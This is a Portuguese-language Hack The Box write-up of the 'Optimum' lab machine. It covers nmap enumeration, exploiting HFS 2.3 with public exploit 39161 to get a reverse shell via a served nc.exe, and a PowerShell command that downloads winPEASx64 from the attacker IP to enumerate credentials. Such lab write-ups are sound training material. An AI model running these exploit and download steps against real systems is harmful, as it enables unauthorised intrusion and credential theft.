Optimum - HTB Write Up - HFS 2.3 Exploit
HFS 2.3 Exploit
Enumeração
NMAP Geral
nmap -Pn -sV [IP]
HTTP Scan
nmap -Pn -A -p 80 [IP]
O resultado do scan mostra a aplicação HFS na versão 2.3 na porta 80/tcp
Usando o Searchsploit para buscar exploits disponíveis para o HFS
searchsploit HFS
No resultado do scan, o sistema operacional indicado é Windows. Ao pesquisar pelos exploits, escolhi o 39161 e para executar esse exploit é necessário usar o Python 2.7, então habilitei o ambiente virtual com o Python 2.7
Na descrição do exploit é informado que é necessário executar um web server na máquina-atacante dentro de um diretório onde o nc.exe esteja pois o exploit usar esse executável para fazer a conexão reversa para a máquina-atacante.
O nc.exe pode ser encontrado no Kali em /usr/share/windows-resources/binaries
Na máquina-atacante habilitei o web server com o python 2.7 usando o ambiente virtual
python2.7 -m SimpleHTTPServer 80
No script do exploit é necessário configurar o IP-Local e a Porta-Local da máquina-atacante. A porta configurada é do NCat e não do web server.
Comando para executar o exploit
python2.7 39161.py [IP-Alvo] [PORT-Alvo]
Ao executar o exploit, a conexão reversa é estabelecida.
systeminfo
Usando a ferramenta winPEASx64 para enumerar as informações do servidor e buscar por possíveis pontos de exploração para executar a escalação de privilégio. O download da ferramenta pode ser feito AQUI e o repositório oficial da ferramenta é esse AQUI
Executei o download da ferramenta com o Powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.55:80/winPEASx64.exe', 'c:\Users\kostas\Desktop\winPEASx64.exe')"
Primeiro executei com o parametro userinfo e o resultado trouxe a credencial do usuário Kostas e a informação de que o diretório Administrator é acessível pelo usuário Kostas.
c:\Users\kostas\Desktop\.\winPEASx64.exe userinfo
Comentários
Postar um comentário